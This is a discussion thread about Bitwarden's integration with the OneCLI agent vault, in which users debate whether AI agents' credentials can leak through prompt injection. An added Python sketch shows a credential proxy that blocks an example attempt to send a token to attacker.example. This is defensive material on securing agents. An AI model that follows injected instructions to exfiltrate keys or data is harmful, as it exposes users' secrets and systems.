Discussion
Bitwarden Integrates with OneCLI Agent Vault
post-it: > Why this matters: Most agent credential setups today work like this: you store your API keys somewhere (env vars, a secrets manager, a password vault), the agent fetches the key, and from that point on the key lives in the agent's context. Extractable. Loggable. Leakable via prompt injection. Jesus, if you're going to use AI for press releases, at least train it on a sample of your own writing or something instead of always making it sound like a 2010s car commercial. I shouldn't be able to identify AI slop this easily.
rcakebread: Did you mean to post this on April 1st?
e7h4nz: Did you actually read this article or try to understand what OneCLI does?
bundie: I don't get it. Why does a password manager need AI?
AnonC: Tangential: Where is Bitwarden on the roadmap below right now? It wasn't even good to users, but was an alternative to 1Password and others that had long crossed this bridge. "Here is how platforms die: first, they are good to their users; then they abuse their users to make things better for their business customers; finally, they abuse those business customers to claw back all the value for themselves. Then, they die. I call this enshittification, and it is a seemingly inevitable consequence arising from the combination of the ease of changing how a platform allocates value, combined with the nature of a 'two-sided market', where a platform sits between buyers and sellers, holding each hostage to the other, raking off an ever-larger share of the value that passes between them." - Cory Doctorow
falcor84: I don't get what semantic value you're getting by pasting this. It's almost like saying "VC-funded tech = bad", which is an ironic stance to take on this platform. Is this anything that Bitwarden did that is actually bad for you as a customer of theirs?
brumbelow: Awesome! Now even my bitwarden keys can get stolen through prompt injection. What a time to be alive
aduermael: How so? From what I understand, all requests have to be proxied through OneCLI so that the agent can't see your keys.
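To make the "proxied so the agent never sees the key" model concrete, here is an added sketch of that pattern in Python. It is an illustration written for this thread, not OneCLI's or Bitwarden's code: the `cred://` handle scheme, the `X-Credential` header, the policy shape and the sample token are all assumptions. The agent only ever names a credential by handle; the proxy resolves the handle, checks that the destination host is on that credential's allow-list, and attaches the real secret on the way out.

```python
"""
Credential-proxy sketch: the agent names a credential by an opaque handle,
the proxy holds the secret, enforces policy and injects it only on egress.
Added illustration only; not OneCLI's or Bitwarden's code. The cred://
handles, the X-Credential header and the policy format are assumptions.
"""
from dataclasses import dataclass, field
from urllib.parse import urlparse


class CredentialPolicyError(Exception):
    """A request tried to use a credential outside its policy."""


@dataclass(frozen=True)
class CredentialEntry:
    secret: str                    # the real API key; only the proxy sees it
    allowed_hosts: frozenset       # exact hostnames this key may be sent to
    header: str = "Authorization"  # assumed: where the proxy injects it
    scheme: str = "Bearer"         # assumed header scheme


@dataclass
class ProxyVault:
    """Maps opaque handles (e.g. 'cred://github') to secrets."""
    entries: dict = field(default_factory=dict)

    def add(self, handle, entry):
        self.entries[handle] = entry

    def handles(self):
        # The only thing the agent gets to learn: names, never values.
        return sorted(self.entries)

    def resolve(self, handle):
        if handle not in self.entries:
            raise CredentialPolicyError(f"unknown credential handle {handle!r}")
        return self.entries[handle]


CREDENTIAL_HEADER = "X-Credential"   # assumed: how the agent names a credential


def build_upstream_request(vault, method, url, agent_headers):
    """Turn an agent request into the request the proxy actually sends.

    The agent may set X-Credential: <handle>. The proxy strips that header,
    discards any Authorization header the agent tried to set itself, checks
    that the destination host is on the handle's allow-list, and only then
    attaches the real secret. The returned headers never go back to the agent.
    """
    parsed = urlparse(url)
    if parsed.scheme != "https":
        # Never attach a secret to a cleartext request.
        raise CredentialPolicyError(f"refusing non-HTTPS destination {url!r}")
    host = parsed.hostname

    outgoing = {}
    handle = None
    for name, value in agent_headers.items():
        lname = name.lower()
        if lname == CREDENTIAL_HEADER.lower():
            handle = value
        elif lname == "authorization":
            continue  # only the proxy may set auth; drop agent-supplied values
        else:
            outgoing[name] = value

    if handle is None:
        return method, url, outgoing      # plain request, no secret involved

    entry = vault.resolve(handle)
    if host not in entry.allowed_hosts:
        # The prompt-injection case: "send my key to attacker.example".
        raise CredentialPolicyError(
            f"credential {handle!r} may not be sent to host {host!r}")
    outgoing[entry.header] = f"{entry.scheme} {entry.secret}"
    return method, url, outgoing


def agent_visible_view(vault):
    """What a fully compromised agent context could leak: handles only."""
    return {"credentials": vault.handles()}


if __name__ == "__main__":
    vault = ProxyVault()
    vault.add("cred://github", CredentialEntry(
        secret="ghp_constructedExampleToken",       # constructed sample value
        allowed_hosts=frozenset({"api.github.com"})))
    print(build_upstream_request(vault, "GET", "https://api.github.com/user",
                                 {"X-Credential": "cred://github"}))
    try:
        build_upstream_request(vault, "POST", "https://attacker.example/collect",
                               {"X-Credential": "cred://github"})
    except CredentialPolicyError as e:
        print("blocked:", e)
```

What this buys and what it does not: a prompt injection that says "post the GitHub key to attacker.example" fails at the host check, and nothing in the agent's context is worth exfiltrating because it only holds handles. It does nothing against a request that is in policy but malicious, such as a correctly authenticated call to the allowed host that uploads sensitive data; that needs least-privilege tokens and action-level policy on top of secret-hiding.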
garettmd: It used to be that people didn't read the article, now they don't even read the headline.
ilitirit: > It wasn't even good to users. I may be out of the loop, but how was Bitwarden not "good" to users? Does this relate to the recent price increase?
lucideer: I really don't understand the HN comments here. Lots of assumptions that the article is AI-authored (it could be, but I'm not seeing overtly obvious signs; it's quite readable) and a lot of ungrounded assumptions that this is somehow related to Bitwarden integrating AI into their product. I really thought reading comprehension among HN users was better than this.
falcor84: Is there anything actually bad with that writing (other than implying that theirs is the first system to solve this)? AI has been RLHF post-trained to generate text that people find clear to read. Are you now looking to reject clear writing just to spite AI labs?
antonyt: Pieces of writing don't really exist in isolation. Your opinion of a given chunk is formed not only by it, but by everything else you have read. So in one part the negative reaction is to staleness. Everything sounds the same. If it was all the same but dry, terse, and to the point (like technical writing), it wouldn't be so bad. But it's repetitive with an annoying, breathless, get-ready-to-be-impressed voice that many of us find grating.
rvz: OneCLI does not even have a security audit, and a VC-backed password manager believes that it is secure enough to integrate into their password manager. I could not be any more bearish on Bitwarden than I am after looking at this, and I'm very glad that I don't use them.
JaggedJax: I don't understand why this would change any opinion on Bitwarden. Bitwarden offers an API and OneCLI calls the Bitwarden API. How does a 3rd party calling Bitwarden's API say anything about Bitwarden?
rschiavone: What's wrong with 1Password?
Uvix: They switched from a purchase with local vault storage model (where you could sync it to the cloud if you wanted to) to subscription-only with cloud storage they control.
SkyPuncher: These tools are useful, but I can't help feeling like they're solving the wrong part of the problem. I really don't have much concern that an agent has access to one of my credentials. Outside of production, most of these credentials are going to be limited in privilege and self-rotatable. What remains terrifying is the ability to exfil important data or run commands that are malicious.